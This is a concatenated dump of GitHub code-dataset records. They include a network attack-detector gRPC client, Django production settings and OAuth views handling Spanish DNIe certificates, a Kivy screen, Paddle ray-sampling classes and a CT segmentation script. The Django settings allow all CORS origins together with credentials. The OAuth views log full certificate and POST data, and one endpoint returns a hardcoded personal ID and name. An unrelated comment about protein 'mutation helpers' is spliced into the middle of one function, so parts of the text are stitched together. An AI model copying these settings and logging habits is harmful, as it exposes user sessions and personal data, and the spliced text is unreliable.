sys \nimport os \nimport time\nimport signal\nimport grpc\nimport subprocess\nfrom l3_centralizedattackdetector_pb2_grpc import (\n L3CentralizedattackdetectorStub,\n)\nfrom l3_centralizedattackdetector_pb2 import (\n ModelInput,\n)\n\n# Setup loggers ===============================\nlogger = logging.getLogger('dad_logger')\nlogger.setLevel(logging.INFO)\nlogFormatter = logging.Formatter(fmt='%(levelname)-8s %(message)s')\nconsoleHandler = logging.StreamHandler(stdout)\nconsoleHandler.setFormatter(logFormatter)\nlogger.addHandler(consoleHandler)\n# ==================================\n\nTSTAT_DIR_NAME = \"piped/\"\nCENTRALIZED_ATTACK_DETECTOR = \"localhost:10001\"\nJSON_BLANK = {\n \"ip_o\": \"\", # Client IP\n \"port_o\": \"\", # Client port\n \"ip_d\": \"\", # Server ip\n \"port_d\": \"\", # Server port\n \"flow_id\": \"\", # Identifier:c_ip,c_port,s_ip,s_port,time_start\n \"protocol\": \"\", # Connection protocol\n \"time_start\": 0, # Start of connection\n \"time_end\": 0, # Time of last packet\n}\nMSG = 0\nSTOP = False\n\ndef handler(signum, frame):\n global STOP\n if STOP:\n exit()\n STOP = True\n logger.info(\"Gracefully Stopping...\")\nsignal.signal(signal.SIGINT, handler)\n\ndef follow(thefile, time_sleep):\n \"\"\"\n Generator function that yields new lines in a file\n It reads the logfie (the opened file)\n \"\"\"\n # seek the end of the file\n thefile.seek(0, os.SEEK_END)\n\n 
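# Usage sketch for the mutation helpers above, on a short hypothetical
# sequence over the 20-letter vocabulary (positions are 1-based, matching
# start_ind=1):
# >>> make_mutation("ACDEFG", "C2W")
# 'AWDEFG'
# >>> make_mutation("ACDEFG", "C2W:E4K")   # multi-mutant, ':'-separated
# 'AWDKFG'
# single_mutant_names() enumerates 19 substitutions per position (the
# wildtype residue itself is skipped), so a length-L sequence yields 19*L names.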
trozo = \"\"\n # start infinite loop\n while True:\n # read last line of file\n line = thefile.readline()\n # sleep if file hasn't been updated\n if not line:\n time.sleep(time_sleep)\n continue\n if line[-1] != \"\\n\":\n trozo += line\n else:\n if trozo != \"\":\n line = trozo + line\n trozo = \"\"\n yield line\n\ndef load_file(dirname=TSTAT_DIR_NAME): # - Client side -\n while True:\n here = os.path.dirname(os.path.abspath(__file__))\n tstat_piped = os.path.join(here, dirname)\n tstat_dirs = os.listdir(tstat_piped)\n if len(tstat_dirs) > 0:\n tstat_dirs.sort()\n new_dir = tstat_dirs[-1]\n tstat_file = tstat_piped + new_dir + \"/log_tcp_temp_complete\"\n logger.info(\"Following: {0}\".format(tstat_file))\n return tstat_file\n else:\n logger.info(\"No tstat directory!\")\n time.sleep(5)\n\ndef process_line(line):\n \"\"\"\n - Preprocessing before a message per line\n - Avoids crash when nan are found by generating a 0s array\n - Returns a list of values\n \"\"\"\n def makeDivision(i, j): #Helper function\n return i / j if (j and type(i) != str and type(j) != str) else 0\n\n line = line.split(\" \")\n try:\n n_packets_server, n_packets_client = float(line[16]), float(line[2])\n except:\n return [0 for i in range(9)]\n \n n_bits_server, n_bits_client = float(line[22])*8, float(line[8])*8\n seconds = float(line[30]) # Duration in s\n values = [\n makeDivision(n_packets_server, seconds),\n makeDivision(n_packets_client, seconds),\n makeDivision(n_bits_server, seconds),\n makeDivision(n_bits_client, seconds),\n makeDivision(n_bits_server, n_packets_server),\n makeDivision(n_bits_client, n_packets_client),\n makeDivision(n_packets_server, n_packets_client),\n makeDivision(n_bits_server, n_bits_client),\n ]\n \n return values\n\ndef open_channel():\n with grpc.insecure_channel(CENTRALIZED_ATTACK_DETECTOR) as channel:\n stub = L3CentralizedattackdetectorStub(channel)\n logger.info(\"{0}\".format(stub.SendInput(run())))\n\ndef run():\n filename = load_file()\n logfile = open(filename, \"r\")\n loglines = follow(logfile, 5)\n \n new_connections = {} # Dict for storing NEW data\n connections_db = {} # Dict for storing ALL data\n \n process_time = []\n global MSG\n global STOP\n for line in loglines:\n if STOP:\n break\n MSG += 1\n start = time.time()\n line_id = line.split(\" \")\n conn_id = (line_id[0], line_id[1], line_id[14], line_id[15])\n new_connections[conn_id] = process_line(line)\n try:\n connections_db[conn_id][\"time_end\"] = time.time()\n except KeyError:\n connections_db[conn_id] = JSON_BLANK.copy()\n connections_db[conn_id][\"time_start\"] = time.time()\n connections_db[conn_id][\"time_end\"] = time.time()\n connections_db[conn_id][\"ip_o\"] = conn_id[0]\n connections_db[conn_id][\"port_o\"] = conn_id[1]\n connections_db[conn_id][\"flow_id\"] = \":\".join(conn_id)\n connections_db[conn_id][\"protocol\"] = \"TCP\"\n connections_db[conn_id][\"ip_d\"] = conn_id[2]\n connections_db[conn_id][\"port_d\"] = conn_id[3]\n\n # CRAFT DICT\n inference_information = {\n \"n_packets_server_seconds\": new_connections[conn_id][0],\n \"n_packets_client_seconds\": new_connections[conn_id][1],\n \"n_bits_server_seconds\": new_connections[conn_id][2],\n \"n_bits_client_seconds\": new_connections[conn_id][3],\n \"n_bits_server_n_packets_server\": new_connections[conn_id][4],\n \"n_bits_client_n_packets_client\": new_connections[conn_id][5],\n \"n_packets_server_n_packets_client\": new_connections[conn_id][6],\n \"n_bits_server_n_bits_client\": new_connections[conn_id][7],\n \"ip_o\": 
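# Caveat in process_line() above: the early-exit path returns 9 zeros
# ([0 for i in range(9)]) while the normal path returns the 8-element
# `values` list, so consumers indexing new_connections[conn_id][0..7] see
# rows of two different widths on parse errors. A hedged one-line fix is to
# make both paths the same width and narrow the bare except:
# except (ValueError, IndexError):
#     return [0.0] * 8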
connections_db[conn_id][\"ip_o\"],\n \"port_o\": connections_db[conn_id][\"port_o\"],\n \"ip_d\": connections_db[conn_id][\"ip_d\"],\n \"port_d\": connections_db[conn_id][\"port_d\"],\n \"flow_id\": connections_db[conn_id][\"flow_id\"],\n \"protocol\": connections_db[conn_id][\"protocol\"],\n \"time_start\": connections_db[conn_id][\"time_start\"],\n \"time_end\": connections_db[conn_id][\"time_end\"],\n }\n\n process_time.append(time.time() - start)\n if MSG % 1000 == 0:\n logger.info(\"Lineas: {0}- Tiempo Medio Procesado: {1}\".format(MSG, sum(process_time)/MSG))\n \n yield ModelInput(**inference_information)\n \n\ndef main():\n open_channel()\n \nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"luiscal4a/TeraflowLab","sub_path":"l3_distributedattackdetector/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7519427705","text":"result = []\r\n\r\ndef back(index, rest_day, money, lst):\r\n global result\r\n \r\n\r\n for j in range(index, len(lst)):\r\n if rest_day != 0:\r\n rest_day -= 1\r\n else:\r\n if j + lst[j][0] -1 < len(lst):\r\n back(j+1, lst[j][0]-1, money + lst[j][1], lst)\r\n result.append(money)\r\n\r\nN = int(input())\r\nlst = [list(map(int,input().split())) for _ in range(N)]\r\n\r\nfor i, (consulting_day, money) in enumerate(lst):\r\n if i + consulting_day - 1 < len(lst):\r\n back(i+1, consulting_day-1, money, lst)\r\nif not result:\r\n print(0)\r\nelse:\r\n print(max(result))","repo_name":"ShinJam/Algorithm-Study","sub_path":"1주차/퇴사_종석.py","file_name":"퇴사_종석.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"32327847834","text":"SECURE_CONTENT_TYPE_NOSNIFF = True\nSECURE_BROWSER_XSS_FILTER = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\n\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_ALL_ORIGINS = True\n\nCSRF_COOKIE_DOMAIN = \".trycharlie.xyz\"\nSESSION_COOKIE_DOMAIN = \".trycharlie.xyz\"\n\nCORS_ALLOW_CREDENTIALS = True\nCORS_ALLOW_ALL_ORIGINS = True","repo_name":"sftchance/charlie","sub_path":"api/api/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"13967965649","text":"from django.views.generic import View\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.utils.decorators import method_decorator\nfrom apps.web.decorators import validate_request\nfrom apps.web.responsetypes import factory\nfrom apps.web.forms import AuthorizeForm\nfrom apps.tokens.models import OAuthScope\nfrom apps.credentials.models import OAuthUser\nimport logging\nlogger = logging.getLogger('views')\n\n\nclass DNIe:\n def __init__(self, commonName, givenName, surname, serialNumber, c, certStart=None, certEnd=None):\n self.commonName = commonName\n self.givenName = givenName\n self.surname = surname\n self.serialNumber = serialNumber\n self.c = c\n self.certStart = certStart\n self.certEnd = certEnd\n\n def __str__(self):\n # logger.debug('CN: %s' %(self.commonName))\n # logger.debug('GN: %s' %(self.givenName))\n # logger.debug('SN: %s' %(self.surname))\n # logger.debug('serial: %s' %(self.serialNumber)) \n # logger.debug('C: %s' %(self.c))\n # logger.debug('certStart: %s' %(self.certStart))\n # logger.debug('certEnd: %s' %(self.certEnd))\n 
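# The recursive search in the consulting-schedule snippet above enumerates
# every feasible plan; the same problem admits an O(N) DP over days,
# assuming lst[i] = (duration, pay) as read there:
def max_pay(lst):
    n = len(lst)
    dp = [0] * (n + 1)          # dp[i]: best total pay from day i to the end
    for i in range(n - 1, -1, -1):
        dur, pay = lst[i]
        dp[i] = dp[i + 1]       # option 1: skip day i
        if i + dur <= n:        # option 2: take the job if it finishes in time
            dp[i] = max(dp[i], pay + dp[i + dur])
    return dp[0]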
logger.debug('|-- CN: %s --- GN: %s --- SN: %s --- serialNumber: %s --- C: %s -- certStart: %s -- certEnd: %s --|' % (self.commonName, self.givenName, self.surname, self.serialNumber, self.c, self.certStart, self.certEnd))\n return '|-- CN: %s --- GN: %s --- SN: %s --- serialNumber: %s --- C: %s -- certStart: %s -- certEnd: %s --|' % (self.commonName, self.givenName, self.surname, self.serialNumber, self.c, self.certStart, self.certEnd)\n\n\ndef get_dni_info_from_ssl(request):\n ssl_client_s_dn = request.META['SSL_CLIENT_S_DN']\n ssl_client_s_dn = ssl_client_s_dn.replace('\\,', 'XXXCOMAXXX')\n params = dict(u.split(\"=\") for u in ssl_client_s_dn.split(\",\"))\n for param in params:\n params[param] = params[param].replace('XXXCOMAXXX', ',')\n certStart = request.META['SSL_CLIENT_V_START']\n certEnd = request.META['SSL_CLIENT_V_END']\n strlogger = '*%s, %s*' %(certStart, certEnd)\n logger.warn(strlogger)\n return DNIe(params['CN'], params['GN'], params['SN'], params['serialNumber'], params['C'], certStart, certEnd)\n\n\nclass AuthorizeView(View):\n form_class = AuthorizeForm\n initial = {}\n template_name = 'web/authorize.html'\n\n @method_decorator(validate_request)\n def dispatch(self, *args, **kwargs):\n \"\"\"\n Decorating the dispatch method decorates all methods.\n So both get and post will have the decorator applied.\n \"\"\"\n logger.debug('dispatch')\n return super(AuthorizeView, self).dispatch(*args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n logger.debug('en get_AuthorizeView')\n form = self.form_class(initial=self.initial)\n try:\n logger.debug('en get')\n prueba = request.META['SSL_CLIENT_S_DN']\n logger.debug('prueba: *' + prueba + '*')\n claves = [\n #'HTTPS'\n 'SSL_PROTOCOL'\n # ,'SSL_SESSION_ID'\n ,'SSL_SESSION_RESUMED'\n ,'SSL_SECURE_RENEG'\n ,'SSL_CIPHER'\n ,'SSL_CIPHER_EXPORT'\n ,'SSL_CIPHER_USEKEYSIZE'\n ,'SSL_CIPHER_ALGKEYSIZE'\n ,'SSL_COMPRESS_METHOD'\n ,'SSL_VERSION_INTERFACE'\n ,'SSL_VERSION_LIBRARY'\n ,'SSL_CLIENT_M_VERSION'\n ,'SSL_CLIENT_M_SERIAL'\n ,'SSL_CLIENT_S_DN'\n # ,'SSL_CLIENT_S_DN_x509'\n # ,'SSL_CLIENT_SAN_Email_n'\n # ,'SSL_CLIENT_SAN_DNS_n'\n # ,'SSL_CLIENT_SAN_OTHER_msUPN_n'\n ,'SSL_CLIENT_I_DN'\n # ,'SSL_CLIENT_I_DN_x509'\n ,'SSL_CLIENT_V_START'\n ,'SSL_CLIENT_V_END'\n ,'SSL_CLIENT_V_REMAIN'\n ,'SSL_CLIENT_A_SIG'\n ,'SSL_CLIENT_A_KEY'\n ,'SSL_CLIENT_CERT'\n # ,'SSL_CLIENT_CERT_CHAIN_n'\n # ,'SSL_CLIENT_CERT_RFC4523_CEA'\n ,'SSL_CLIENT_VERIFY'\n ,'SSL_SERVER_M_VERSION'\n ,'SSL_SERVER_M_SERIAL'\n ,'SSL_SERVER_S_DN'\n # ,'SSL_SERVER_SAN_Email_n'\n # ,'SSL_SERVER_SAN_DNS_n'\n # ,'SSL_SERVER_SAN_OTHER_dnsSRV_n'\n # ,'SSL_SERVER_S_DN_x509'\n ,'SSL_SERVER_I_DN'\n # ,'SSL_SERVER_I_DN_x509'\n ,'SSL_SERVER_V_START'\n ,'SSL_SERVER_V_END'\n ,'SSL_SERVER_A_SIG'\n ,'SSL_SERVER_A_KEY'\n ,'SSL_SERVER_CERT'\n # ,'SSL_SRP_USER'\n # ,'SSL_SRP_USERINFO'\n # ,'SSL_TLS_SNI']\n ]\n for k in claves:\n try:\n logger.warn(k+': '+str(request.META[k]))\n except Exception as ex:\n logger.warn(k+': no funciona esto de recorrer el meta')\n logger.warn(ex)\n\n\n dnie = get_dni_info_from_ssl(request)\n except Exception as e:\n logger.warn('get_No vienen las credenciales del DNIe')\n\n return self._render(request=request, form=form, dnie=dnie)\n\n def post(self, request, *args, **kwargs):\n logger.debug('en post_AuthorizeView')\n form = self.form_class(request.POST)\n\n mstring = []\n for key in request.POST.iterkeys():\n valuelist = request.POST.getlist(key)\n mstring.extend(['%s=%s' % (key, val) for val in valuelist])\n msg = ','.join(mstring)\n logger.debug(msg)\n 
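# get_dni_info_from_ssl() above shields escaped commas with a placeholder
# before splitting the DN into key=value pairs; a compact equivalent that
# also survives '=' inside values (hypothetical helper, same placeholder
# trick with a non-printing sentinel):
def parse_client_dn(dn):
    shielded = dn.replace('\\,', '\x00')
    pairs = (field.split('=', 1) for field in shielded.split(','))
    return {k.strip(): v.replace('\x00', ',') for k, v in pairs}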
try:\n logger.debug(request.POST['client_type'])\n #logger.debug(request.client_type)\n # Si la peticion viene desde la app Android, vamos por otro camino\n #if request.client_type == 'androidnfcapp':\n if request.POST['client_type'] == 'androidnfcapp':\n return self.post_android_app(request, *args, **kwargs)\n\n except Exception as e:\n logger.warn('Excepcion: ' + e.message)\n\n claves = [\n #'HTTPS'\n 'SSL_PROTOCOL'\n # ,'SSL_SESSION_ID'\n ,'SSL_SESSION_RESUMED'\n ,'SSL_SECURE_RENEG'\n ,'SSL_CIPHER'\n ,'SSL_CIPHER_EXPORT'\n ,'SSL_CIPHER_USEKEYSIZE'\n ,'SSL_CIPHER_ALGKEYSIZE'\n ,'SSL_COMPRESS_METHOD'\n ,'SSL_VERSION_INTERFACE'\n ,'SSL_VERSION_LIBRARY'\n ,'SSL_CLIENT_M_VERSION'\n ,'SSL_CLIENT_M_SERIAL'\n ,'SSL_CLIENT_S_DN'\n # ,'SSL_CLIENT_S_DN_x509'\n # ,'SSL_CLIENT_SAN_Email_n'\n # ,'SSL_CLIENT_SAN_DNS_n'\n # ,'SSL_CLIENT_SAN_OTHER_msUPN_n'\n ,'SSL_CLIENT_I_DN'\n # ,'SSL_CLIENT_I_DN_x509'\n ,'SSL_CLIENT_V_START'\n ,'SSL_CLIENT_V_END'\n ,'SSL_CLIENT_V_REMAIN'\n ,'SSL_CLIENT_A_SIG'\n ,'SSL_CLIENT_A_KEY'\n ,'SSL_CLIENT_CERT'\n # ,'SSL_CLIENT_CERT_CHAIN_n'\n # ,'SSL_CLIENT_CERT_RFC4523_CEA'\n ,'SSL_CLIENT_VERIFY'\n ,'SSL_SERVER_M_VERSION'\n ,'SSL_SERVER_M_SERIAL'\n ,'SSL_SERVER_S_DN'\n # ,'SSL_SERVER_SAN_Email_n'\n # ,'SSL_SERVER_SAN_DNS_n'\n # ,'SSL_SERVER_SAN_OTHER_dnsSRV_n'\n # ,'SSL_SERVER_S_DN_x509'\n ,'SSL_SERVER_I_DN'\n # ,'SSL_SERVER_I_DN_x509'\n ,'SSL_SERVER_V_START'\n ,'SSL_SERVER_V_END'\n ,'SSL_SERVER_A_SIG'\n ,'SSL_SERVER_A_KEY'\n ,'SSL_SERVER_CERT'\n # ,'SSL_SRP_USER'\n # ,'SSL_SRP_USERINFO'\n # ,'SSL_TLS_SNI']\n ]\n for k in claves:\n try:\n logger.warn(k+': '+str(request.META[k]))\n except Exception as ex:\n logger.warn(k+': no funciona esto de recorrer el meta')\n logger.warn(ex)\n try:\n logger.debug('enn post')\n prueba = request.META['SSL_CLIENT_S_DN']\n logger.debug('prueba: *' + prueba + '*')\n dnie = get_dni_info_from_ssl(request)\n logger.debug('dnie: *' + str(dnie) + '*')\n except Exception as e:\n logger.warn('post_No vienen las credenciales del DNIe')\n logger.warn(e)\n dnie = None\n\n logger.debug('form.is_valid' + str(form.is_valid()))\n if not form.is_valid():\n return self._render(request=request, form=form)\n\n logger.debug('hhhhhhhhhhhhhhhhhhhhhhh: ' + request.redirect_uri + ', request.response_type = ' + request.response_type)\n return factory(response_type=request.response_type).process(\n client=request.client,\n authorized=form.cleaned_data['authorize'],\n scopes=form.cleaned_data['scopes'],\n redirect_uri=request.redirect_uri,\n state=request.state,\n dnie=dnie\n )\n\n def post_android_app(self, request, *args, **kwargs):\n # Si la peticion viene desde la App de Android, tenemos que tratar la respuesta de forma diferente.\n try:\n logger.debug('enn post_android_app')\n prueba = request.META['SSL_CLIENT_S_DN']\n logger.debug('prueba: *' + prueba + '*')\n dnie = get_dni_info_from_ssl(request)\n logger.debug('dnie: *' + str(dnie) + '*')\n except Exception as e:\n logger.warn('No vienen las credenciales del DNIe')\n dnie = None\n\n authorized = True\n try:\n # Si la peticion viene desde la app Android, vamos por otro camino\n #if request.step == '1':\n if request.POST['step'] == '1':\n logger.debug('request.POST[\"step\"]: ' + request.POST['step'])\n permisosObj = OAuthScope.objects.all()\n from django.core import serializers\n data = serializers.serialize('json', permisosObj)\n logger.debug(data)\n from django.http import HttpResponse\n return HttpResponse(data, content_type='application/json')\n\n except Exception as e:\n logger.error('Exception: ' + 
e.message)\n return None\n\n # Los scopes deben venir de la peticion del cliente Android, pero por ahora simulamos que se acepta todos\n permisosObj = OAuthScope.objects.all()\n scopes = [1,2]\n\n logger.debug('redirect_uri: ' + request.redirect_uri)\n logger.debug('request.response_type('+request.response_type+')')\n logger.debug('request.client('+str(request.client)+')')\n logger.debug('authorized('+str(authorized)+')')\n logger.debug('scopes('+str(scopes)+')')\n logger.debug('request.redirect_uri('+str(request.redirect_uri)+')')\n logger.debug('state='+str(request.state)+'')\n logger.debug('dnie='+str(dnie)+'')\n logger.debug('client_type='+str(request.POST[\"client_type\"])+'')\n try:\n return factory(response_type=request.response_type).process(\n client=request.client,\n authorized=authorized,\n scopes=scopes,\n redirect_uri=request.redirect_uri,\n state=request.state,\n dnie=dnie,\n client_type=request.POST['client_type']\n )\n except Exception as e:\n logger.error(e.message)\n logger.error(e)\n\n def _render(self, request, form, dnie=None, cadena=None, prueba=None):\n return HttpResponse(render(request, self.template_name, {\n 'title': 'Authorize', 'client': request.client,\n 'form': form, 'scopes': OAuthScope.objects.all(), 'prueba': prueba, 'dnie': dnie, 'prueba': prueba}))\n\n # def _render(self, request, form):\n # return HttpResponse(render(request, self.template_name, {\n # 'title': 'Authorize', 'client': request.client,\n # 'form': form, 'scopes': OAuthScope.objects.all()}))\n\n\nfrom apps.tokens.decorators import authentication_required\nimport json\n\n\ndef me_view(request, *args, **kwargs):\n logger.debug('me_view <--------------------------')\n from rest_framework.response import Response\n data = {\n 'id': '53159931P',\n 'name': 'Carlos Jimenez',\n 'email': 'mi@email.com',\n }\n return HttpResponse(\n json.dumps(data),\n content_type='application/json',\n )\n","repo_name":"Betisman/pfc-carlosjg","sub_path":"src/oauth2server/oauth2server/apps/web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"722214657","text":"import contextlib\nfrom View.base_screen import BaseScreenView\n\n\nclass MainScreenView(BaseScreenView):\n '''Implements the login start screen in the user application.'''\n\n def __init__(self, **kw):\n super().__init__(**kw)\n self.model.add_observer(self)\n self.ids.maintopbar.title = self.controller.get_serial_number()\n self.app.serial_number = self.ids.maintopbar.title\n\n def model_is_changed(self) -> None:\n\n '''\n Called whenever any change has occurred in the data model.\n The view in this method tracks these changes and updates the UI\n according to these changes.\n '''\n\n status = self.model.device_status\n with contextlib.suppress(Exception):\n self.ids.temperature.text = f'Температура термоблока:\\\n \\n {self.model.tb_temperature[0]}°C'\n self.ids.device_status.text = (\n 'Состояние прибора:\\n готов'\n if int(status) == 5\n else 'Состояние прибора:\\n прогрев'\n )\n\n def on_enter(self, *args):\n self.set_screen_is_active(True)\n self.controller.get_device_status()\n\n if self.app.user_login is None:\n self.ids.name_label.text = 'Пользователь: Гость'\n else:\n self.ids.name_label.text = f'Пользователь: {self.app.user_login}'\n\n def callback(self, instance):\n if instance.icon == 'power':\n quit()\n if instance.icon == 'arrow-up-drop-circle-outline':\n self.controller.tb_movement()\n\n def 
set_screen_is_active(self, state):\n self.controller.set_screen_is_active(state)\n","repo_name":"black0rainbovv/DT_Interface","sub_path":"View/MainScreen/main_screen.py","file_name":"main_screen.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"20767666866","text":"from dataclasses import dataclass\nfrom typing import Callable\n\nimport paddle\n\nfrom pprndr.cameras.math_functionals import (Gaussians,\n conical_frustum_to_gaussian)\n\n__all__ = [\"RayBundle\", \"Frustums\", \"RaySamples\"]\n\n\nclass Frustums(object):\n \"\"\"\n Args:\n origins: Ray origins. Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n directions: Ray directions. Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n starts: Where each frustum starts along a ray. Shape: [num_rays, num_samples, 1] or [num_total_samples, 1].\n ends: Where each frustum ends along a ray. Shape: [num_rays, num_samples, 1] or [num_total_samples, 1].\n pixel_area: Pixel areas at a distance 1 from ray origins.\n Shape: [num_rays, num_samples, 1] or [num_total_samples, 1].\n positions: Coordinates of samples along the rays.\n Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n offsets: Offsets for each sample position wrt. to the center of the frustum.\n Shape: [num_rays, num_samples, 3] or [num_total_samples, 3].\n \"\"\"\n\n def __init__(self,\n origins: paddle.Tensor,\n directions: paddle.Tensor,\n starts: paddle.Tensor,\n ends: paddle.Tensor,\n pixel_area: paddle.Tensor = None,\n positions: paddle.Tensor = None,\n offsets: paddle.Tensor = None):\n self.origins = origins\n self.directions = directions\n self.starts = starts\n self.ends = ends\n self.pixel_area = pixel_area\n self.offsets = offsets\n\n if positions is not None:\n self._positions = positions\n\n @property\n def deltas(self):\n return self.ends - self.starts\n\n @property\n def positions(self) -> paddle.Tensor:\n if hasattr(self, \"_positions\"):\n return self._positions\n else:\n positions = self.origins + self.directions * (\n self.starts + self.ends) / 2.0\n if self.offsets is not None:\n positions += self.offsets\n return positions\n\n @property\n def gaussians(self) -> Gaussians:\n \"\"\"\n Calculates guassian approximation of conical frustum.\n Returns:\n Conical frustums approximated by gaussian distribution.\n \"\"\"\n\n return conical_frustum_to_gaussian(\n origins=self.origins,\n directions=self.directions,\n starts=self.starts,\n ends=self.ends,\n pixel_area=self.pixel_area)\n\n\n@dataclass\nclass RaySamples:\n frustums: Frustums\n \"\"\"Frustums for each ray sample.\"\"\"\n camera_ids: paddle.Tensor = None\n \"\"\"Camera ids for each ray sample. Shape: [num_rays, num_samples, 1] or [num_total_samples, 1]\"\"\"\n spacing_bins: paddle.Tensor = None\n \"\"\"Spacing bins for each ray sample. Only available if samples are not packed. Shape: [num_rays, num_samples + 1, 1]\n \"\"\"\n spacing2euclidean_fn: Callable = None\n \"\"\"Function to convert positions in spacing domain to euclidean domain. Only available if samples are not packed.\"\"\"\n packed_info: paddle.Tensor = None\n \"\"\"Packed info for each ray sample Only available if samples are packed. Shape: [num_rays, 2]\"\"\"\n ray_indices: paddle.Tensor = None\n \"\"\"Ray indices for each ray sample. Only available if samples are packed. 
Shape: [num_total_samples, 1]\"\"\"\n\n @property\n def spacing_starts(self):\n return self.spacing_bins[..., :-1, :]\n\n @property\n def spacing_ends(self):\n return self.spacing_bins[..., 1:, :]\n\n\n@dataclass\nclass RayBundle:\n origins: paddle.Tensor\n \"\"\"Ray origins. Shape: [num_rays, 3].\"\"\"\n directions: paddle.Tensor\n \"\"\"Ray directions. Shape: [num_rays, 3].\"\"\"\n pixel_area: paddle.Tensor\n \"\"\"Pixel areas at a distance 1 from ray origins. Shape: [num_rays, 1].\"\"\"\n camera_ids: paddle.Tensor\n \"\"\"Camera ids for each ray. Shape: [num_rays, 1].\"\"\"\n\n @property\n def num_rays(self):\n return len(self.origins)\n\n def __len__(self):\n return self.num_rays\n\n def __getitem__(self, indices) -> \"RayBundle\":\n return RayBundle(\n origins=self.origins[indices],\n directions=self.directions[indices],\n pixel_area=self.pixel_area[indices],\n camera_ids=self.camera_ids[indices])\n\n def generate_ray_samples(\n self,\n euclidean_bins: paddle.Tensor,\n spacing_bins: paddle.Tensor,\n spacing2euclidean_fn: Callable = None) -> RaySamples:\n n_smaples_per_ray = euclidean_bins.shape[-2] - 1\n\n ray_bundle = self[..., None, :]\n\n frustums = Frustums(\n origins=ray_bundle.origins.repeat_interleave(\n n_smaples_per_ray, axis=-2),\n directions=ray_bundle.directions.repeat_interleave(\n n_smaples_per_ray, axis=-2),\n starts=euclidean_bins[..., :-1, :],\n ends=euclidean_bins[..., 1:, :],\n pixel_area=ray_bundle.pixel_area.repeat_interleave(\n n_smaples_per_ray, axis=-2))\n ray_samples = RaySamples(\n frustums=frustums,\n camera_ids=ray_bundle.camera_ids.repeat_interleave(\n n_smaples_per_ray, axis=-2),\n spacing_bins=spacing_bins,\n spacing2euclidean_fn=spacing2euclidean_fn)\n return ray_samples\n","repo_name":"sayoriaaa/ddl-project","sub_path":"pprndr/cameras/rays.py","file_name":"rays.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"20595886238","text":"import pydicom\nimport numpy as np\nimport cv2\nimport os\nimport matplotlib.pyplot as plt\nimport scipy\nfrom scipy import ndimage\nfrom skimage import morphology\n\n\ndef window_image(image, window_center, window_width):\n img_min = window_center - window_width // 2 # use the double slash // operator to perform floor division\n img_max = window_center + window_width // 2\n window_image = image.copy()\n window_image[window_image < img_min] = img_min\n window_image[window_image > img_max] = img_max\n smallest_window = window_image.min(axis=(0, 1))\n largest_window = window_image.max(axis=(0, 1))\n print(\"wmin / wmax\", smallest_window, largest_window)\n print(\"window\", window_image.shape)\n return window_image\n\n\ndef transform_to_hu(medical_image, image):\n intercept = medical_image.RescaleIntercept\n slope = medical_image.RescaleSlope\n hu_image = image * slope + intercept\n print(\"hu\", hu_image.shape)\n return hu_image\n\n\ndef remove_noise(medical_image):\n image = medical_image.pixel_array\n smallest_image = image.min(axis=(0, 1))\n largest_image = image.max(axis=(0, 1))\n print(\"imin / imax\", smallest_image, largest_image)\n print(\"image\", image.shape)\n hu_image = transform_to_hu(medical_image, image)\n smallest_hu = hu_image.min(axis=(0, 1))\n largest_hu = hu_image.max(axis=(0, 1))\n print(\"hmin / hmax\", smallest_hu, largest_hu)\n brain_img = window_image(hu_image, 40, 80)\n smallest_brain = brain_img.min(axis=(0, 1))\n largest_brain = brain_img.max(axis=(0, 1))\n print(\"bmin / bmax\", smallest_brain, 
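# Hedged usage sketch for the containers above: Frustums.positions defaults
# to the frustum midpoints, origins + directions * (starts + ends) / 2,
# unless explicit positions/offsets were provided at construction.
import paddle

f = Frustums(
    origins=paddle.zeros([4, 8, 3]),
    directions=paddle.ones([4, 8, 3]),
    starts=paddle.full([4, 8, 1], 0.1),
    ends=paddle.full([4, 8, 1], 0.3),
)
assert f.positions.shape == [4, 8, 3]    # every coordinate is 0.2 here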
largest_brain)\n print(\"brain\", brain_img.shape)\n segmentation = morphology.dilation(brain_img, np.ones((1, 1)))\n labels, label_nb = ndimage.label(segmentation)\n label_count = np.bincount(labels.ravel().astype(int))\n label_count[0] = 0\n mask = labels == label_count.argmax()\n\n mask = morphology.dilation(mask, np.ones((1, 1)))\n mask = scipy.ndimage.binary_fill_holes(mask)\n mask = morphology.dilation(mask, np.ones((3, 3)))\n masked_image = mask * brain_img\n print(\"masked\", masked_image.shape)\n return mask, masked_image, brain_img\n\n\npath = \"data/test/patient40/CT000001.dcm\"\nmedical_image = pydicom.read_file(path)\nplt.subplot(1,4,1)\nplt.title('original')\nplt.style.use('grayscale')\nplt.imshow(medical_image.pixel_array)\nplt.plot()\n\nmask, masked_image, brain_img = remove_noise(medical_image)\nplt.subplot(1,4,2)\nplt.style.use('grayscale')\nplt.title('mask')\nplt.imshow(mask)\nplt.plot()\n\nplt.subplot(1,4,3)\nplt.imshow(masked_image)\nplt.title('segmented image')\nplt.plot()\n\nplt.subplot(1,4,4)\nplt.imshow(brain_img)\nplt.title('brain image')\nplt.plot()\nplt.show()\n\n","repo_name":"RavzaTk/UNETSegmentationonCTScanImagesmodel2","sub_path":"segmentasyon_deneme.py","file_name":"segmentasyon_deneme.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 